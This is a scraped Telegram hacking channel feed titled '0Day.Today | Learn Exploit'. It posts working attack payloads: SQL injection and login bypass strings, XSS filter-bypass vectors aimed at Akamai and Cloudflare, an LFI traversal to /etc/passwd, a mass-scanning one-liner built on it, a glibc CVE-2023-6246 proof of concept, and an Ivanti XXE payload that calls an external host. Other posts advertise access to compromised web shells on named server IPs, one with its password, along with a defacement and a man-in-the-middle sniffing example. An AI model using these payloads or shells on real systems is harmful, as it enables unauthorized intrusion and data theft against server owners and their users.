0Day.Today | Learn Exploit | Zero World | Dark web |
18.8K subscribers
1.23K photos
123 videos
487 files
1.26K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
Blind SQL Injection payload

if(now()=sysdate()%2Csleep(10)%2C0)

#Sql #sql_injection #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
5👍2❤‍🔥1
Blackhat hacking course

Download

#Download
——————
0Day.Today
@LearnExploit
@Tech_Army
👎16👍11❤‍🔥831
🙏 apiosintDS 🙏

On demand query API for Threat-Intel project.

💬
apiosintDS is a python client library for public API lookup service over OSINT IoCs stored at DigitalSide Threat-Intel repository. It can be defined a Service as a Library tool designed to act both as a standard Python library to be included in your own Python application and as command line tool. Query can be performed against souspicious IPs, domains, urls and file hashes. Data stored has a 7 days retention.

🔼 Install:
The easy way via pip:
👩‍💻 pip3 install apiosintDS

👩‍💻 From sources:
`apiosintDS
python3 -m pip install .`

👥 Example:
apiosintDS -e 7cb796c875cccc9233d82854a4e2fdf0
apiosintDS -e h[REMOVED]p://193.35.18.147/bins/k.arm -st -p -nc

😸 Github

⬇️ Download
🔒 LearnExploit

#api #ioc #cybersecurity

🔥 0Day.Today
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
6👍31
👁‍🗨 You probably know that

👩‍💻 <Img Src=javascript:alert(1)>

🚫 Doesn't work anymore (although several lists out there have it)

🔄 But if you add

👩‍💻 OnError=location=src

It does!

👁‍🗨 Example:
https://brutelogic.com.br/gym.php?p05=%3CImg+Src=javascript:alert(1)+OnError=location=src%3E

⚠️ Not so useful but who knows your next inline injection scenario?

#XSS

🔥 0Day.Today
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
👍922❤‍🔥1
🕸 Site
👁‍🗨 Mirror-h

Country: 🇺🇸

#Deface

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
41🔥1
PHP: 7.0.33

Safe Mode: OFF

ServerIP: 208.109.13.219 [🇸🇬]

HDD: Total:149.99 GB
Free:28.53 GB [19%]

Useful : gcc cc ld make php perl python ruby tar gzip nc

Downloader: wgetl ynx links curl lwp-mirror

Disable Functions: All Functions Accessible

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON

Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE

SoftWare: Apache

🔗 Link
pwd: bugcod3

Enjoy... ⭐️

#Shell

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
4👍2🔥1
PHP: 8.2.15

Safe Mode: OFF

ServerIP: 50.116.94.196 [🇺🇸]

Domains: 428 domains

HDD: Total:393.53 GB
Free:21.53 GB [5%]

Useful : make php perl python ruby tar gzip nc

Downloader: wget lynx links curl lwp-mirror

Disable Functions: All Functions Accessible

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : ON
Sole Sad & Invisible

Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE

SoftWare: Apache

🔗 Link

Enjoy... ⭐️

#Shell

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍42
Akamai WAF

&lt;A %252F=""Href= JavaScript:k='a',top[k%2B'lert'](1)&gt;

Vector PoC

#xss #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
5🔥2👍1
CVE-2023-6246 - Heap-based buffer overflow in the glibc's syslog

POC :

(exec -a "printf '%0128000x' 1" /usr/bin/su &lt; /dev/null)

#Cve #Poc
——————
0Day.Today
@LearnExploit
@Tech_Army
5👍3🔥2
Bypass Cloudflare WAF (XSS without parentheses) inside an anchor tag

javascript:var{a:onerror}={a:alert};throw%20document.domain

#xss #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
43🔥3👍1
[+] FIlter bypass techniques:

Sometimes you can do amazing things just by appending /? to bypass access control restrictions

POC:
https://targetdomain/api/endpoint <-- Access Denied

https://targetdomain/api/endpoint/? <--- Access to entire customer database

#AEMSecurity #FilterBypass #bugbountytips

🔥 0Day.Today
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
84👍1🔥1
another #SQLi found! This time Microsoft SQL Server database vulnerable to stacked queries.

Payload ' or 1=1 -- - bypassed the login site, and then confirmed injection point with ';WAITFOR DELAY '0:0:5'-- executing a 5s delay

#VPD #BugBounty #security

🔥 0Day.Today
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
52👍1🔥1
🕵️‍♂️ PacketSpy 🕵️‍♂️

💬 Description:
PacketSpy is a powerful network packet sniffing tool designed to capture and analyze network traffic. It provides a comprehensive set of features for inspecting HTTP requests and responses, viewing raw payload data, and gathering information about network devices. With PacketSpy, you can gain valuable insights into your network's communication patterns and troubleshoot network issues effectively.

📊 Features:
⚪️ Packet Capture: Capture and analyze network packets in real-time.
⚪️ HTTP Inspection: Inspect HTTP requests and responses for detailed analysis.
⚪️ Raw Payload Viewing: View raw payload data for deeper investigation.
⚪️ Device Information: Gather information about network devices, including IP addresses and MAC addresses.

🔼 Installation:
cd PacketSpy
pip install -r requirements.txt


💻 Usage:
python3 packetspy.py --help


📂 Examples:
#Device Detection
python3 packetspy.py -tf 10.0.2.0/24 -i eth0

#Man-in-the-Middle Sniffing
python3 packetspy.py -t 10.0.2.11 -g 10.0.2.1 -i eth0


😸 Github

⬇️ Download
🔒 LearnExploit

#Python #Network #Packet #Sniffing #Tools

🔥 0Day.Today
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
5👍42🔥1
PHP: 8.1.27

Safe Mode: OFF

ServerIP: 213.158.95.90 [🇮🇹]

HDD: Total:1536.00 GB
Free:1322.97 GB [86%]

useful:--------------

Downloader: --------------

Disable Functions: All Functions Accessible

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : OFF

Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE

SoftWare: nginx/1.22.0

🔗 Link

Enjoy... ⭐️

#Shell

🔥 0Day.Today
📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
7👍31🔥1
CloudFlare Bypass

&lt;Img Src=OnXSS OnError=alert(1)&gt;

#Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
111
LFI Payload⚡️

Payload: 


".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"

#LFI #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
103❤‍🔥1🔥1
0Day.Today | Learn Exploit | Zero World | Dark web |
LFI Payload⚡️ Payload:  ".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" #LFI #Payload —————— 0Day.Today @LearnExploit @Tech_Army
Sick Finding 🥵⚡️

cat rootDomains.txt | assetfinder -subs-only | httpx -silent -p 80,443,8080,8443,9000 -nc -path ".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" -mr "root:x" | tee -a p1s.txt

#tip
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥10👍2
CVE-2024-22024 - XXE on Ivanti Connect Secure

payload encoded base64:

&lt;?xml version="1.0" ?&gt;&lt;!DOCTYPE root [&lt;!ENTITY % xxe SYSTEM "http://{{external-host}}/x"&gt; %xxe;]&gt;&lt;r&gt;&lt;/r&gt;

⚠️ send it to 127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm

#CVE #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥7👍4